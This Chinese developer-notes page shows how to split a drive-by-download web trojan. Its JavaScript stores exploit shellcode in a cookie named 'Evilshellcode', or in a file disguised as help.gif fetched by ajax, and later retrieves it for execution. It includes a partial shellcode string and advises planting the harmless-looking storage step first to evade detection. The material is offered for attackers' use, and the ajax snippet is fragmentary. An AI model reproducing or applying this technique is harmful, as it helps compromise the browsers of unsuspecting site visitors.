热门标签 | HotTags
当前位置:  开发笔记 > 前端 > 正文

一个网马的tips实现分析

把网马拆分,shellcode代码存在另一个地方。好比把一个网马的shellcode存在cookie里,别一个页面来调用。或是存在另一个文件里用ajax来调用。当然想存更多的代码也可以。
COOKIE示例代码:
代码如下:

//存放
function setCOOKIE(sVar, sVal){
theCOOKIE = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC';
document.COOKIE = theCOOKIE;}
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......"
setCOOKIE('Evilshellcode', shellcode);
//取出
function getCOOKIE(sVar){
COOKIEs = document.COOKIE.split('; ');
for(var i = 1; i <= COOKIEs.length; i++){
if(COOKIEs[i - 1].split('=')[0] == sVar){return COOKIEs[i - 1].split('=')[1];}}
return '';
}
a=unescape(getCOOKIE('Evilshellcode'))


COOKIE存放的话,可以挂两次,第一次挂COOKIE写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用
代码如下:

async: false
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec
推荐阅读
author-avatar
米字格时光
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有